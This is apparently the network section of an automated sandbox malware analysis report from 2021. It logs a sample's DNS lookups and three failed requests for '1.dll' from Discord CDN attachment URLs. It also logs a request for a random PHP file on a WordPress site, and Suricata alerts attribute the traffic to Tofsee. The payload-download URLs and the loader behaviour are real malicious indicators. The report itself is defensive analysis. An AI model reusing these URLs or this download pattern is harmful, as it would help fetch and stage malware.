Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
investtomontenegro.com | 34.94.136.184 | |
lamisionerafm.com | 51.222.42.168 | |
cdn.discordapp.com | 162.159.129.233 |
- TCP Requests
- UDP Requests
-
-
192.168.56.103:53893 164.124.101.2:53
-
192.168.56.103:58465 164.124.101.2:53
-
192.168.56.103:63128 164.124.101.2:53
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:138 192.168.56.255:138
-
192.168.56.103:49152 239.255.255.250:3702
-
192.168.56.103:49168 239.255.255.250:1900
-
192.168.56.103:49170 239.255.255.250:3702
-
192.168.56.103:49172 239.255.255.250:3702
-
192.168.56.103:49174 239.255.255.250:3702
-
8.8.8.8:53 192.168.56.103:63128
-
GET
403
https://cdn.discordapp.com/attachments/876792192524501045/876837913906774076/1.dll
REQUEST
RESPONSE
BODY
GET /attachments/876792192524501045/876837913906774076/1.dll HTTP/1.1
Accept: */*
User-Agent: jsUwNDWtvXTD
Accept-Language: ko
Accept-Encoding: gzip, deflate
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 403 Forbidden
Date: Mon, 23 Aug 2021 09:56:04 GMT
Content-Type: application/xml; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 68337804cb3c12ea-ICN
Cache-Control: private, max-age=0
Expires: Mon, 23 Aug 2021 09:56:04 GMT
Vary: Accept-Encoding
CF-Cache-Status: MISS
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ADPycdvLK_Hh3Ewn2NQcHhFf1wX7fxLCkHH3cZfBtiBuJZQff7OX9jI4CuXPW_XhtyjvjH3oLh81uyb2CjlDx_a5oAiELTq37w
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Yoz%2FrBF%2Bu0iz9HxfK4fDWEQiDt3Qeh%2FNsYYFOC9MBhHB79TSBHbChEr7A%2BzhhAgaCEkZxalC7JhehqqmV0Ej9lT8c7oeXr430ClebzhuiNqQJmk6nN9S0gsVO9%2BjCdd1ePITAw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
Content-Encoding: gzip
GET
403
https://cdn.discordapp.com/attachments/876792192524501045/876837688651681843/1.dll
REQUEST
RESPONSE
BODY
GET /attachments/876792192524501045/876837688651681843/1.dll HTTP/1.1
Accept: */*
User-Agent: jsUwNDWtvXTD
Accept-Language: ko
Accept-Encoding: gzip, deflate
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 403 Forbidden
Date: Mon, 23 Aug 2021 09:56:04 GMT
Content-Type: application/xml; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 683378065d8112ea-ICN
Cache-Control: private, max-age=0
Expires: Mon, 23 Aug 2021 09:56:04 GMT
Vary: Accept-Encoding
CF-Cache-Status: MISS
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ADPycdvFzrJl2ilyQIiagsRzKkp8UpztEoYRVkvIlKpCvvXIP_CDgWFlLHQ4lMBi_1jdzxyteEKg3FgtCwZvSYnDaLZAVX-5nA
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1DixOsJaOvgym9PFehOwlFpLy5BKYYRk88LIFfmyjwb4nqu1CN4MuRwf%2FJK41aIsFZm3KRElt9A5fh%2Bu5dbOvoUYxKl3ez0oWhUVBSx%2BYscbCCLwewvdCnerLUi8v3dWCRJcwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
Content-Encoding: gzip
GET
403
https://cdn.discordapp.com/attachments/876792192524501045/876837576193998848/1.dll
REQUEST
RESPONSE
BODY
GET /attachments/876792192524501045/876837576193998848/1.dll HTTP/1.1
Accept: */*
User-Agent: jsUwNDWtvXTD
Accept-Language: ko
Accept-Encoding: gzip, deflate
Host: cdn.discordapp.com
Connection: Keep-Alive
HTTP/1.1 403 Forbidden
Date: Mon, 23 Aug 2021 09:56:04 GMT
Content-Type: application/xml; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 68337807cfdf12ea-ICN
Cache-Control: private, max-age=0
Expires: Mon, 23 Aug 2021 09:56:04 GMT
Vary: Accept-Encoding
CF-Cache-Status: MISS
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
X-GUploader-UploadID: ADPycduMnjLXaOsAEi4oqzfXi279rVrAfOG7Qxx3FdAtCfsh0xvR3V5lAF2GOftk4FbbBofS3GyQiQtJULwG8AlNSrE2rnu8XQ
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=imPPFgBUieYH9XarSABfSM15WPASYFnop6%2FTAjhajKx43eJ%2FvP2iykoSp56ktKFvB9woj7IqSXi8eGjMRa24%2BqIqSOPpGcQ5m9A6CYhrSwMZy1UXmFGUV1JWoRZRtIJEXFfVLw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
Content-Encoding: gzip
GET
404
https://investtomontenegro.com/wp-content/plugins/wordpress-seo/lib/migrations/8dXd8jlaax.php
REQUEST
RESPONSE
BODY
GET /wp-content/plugins/wordpress-seo/lib/migrations/8dXd8jlaax.php HTTP/1.1
Accept: */*
User-Agent: jsUwNDWtvXTD
Accept-Language: ko
Accept-Encoding: gzip, deflate
Host: investtomontenegro.com
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Date: Mon, 23 Aug 2021 09:56:05 GMT
Server: Apache
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 23
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.103 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49171 -> 162.159.130.233:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.103:49173 -> 34.94.136.184:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.103:49174 -> 51.222.42.168:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 51.222.42.168:443 -> 192.168.56.103:49176 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic |
TCP 192.168.56.103:49175 -> 51.222.42.168:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49171 162.159.130.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
TLSv1 192.168.56.103:49173 34.94.136.184:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=investtomontenegro.com | 48:5a:fd:95:f4:1a:2d:dd:aa:b3:d6:d0:74:b2:a8:55:b2:c5:d2:5b |
Snort Alerts
No Snort Alerts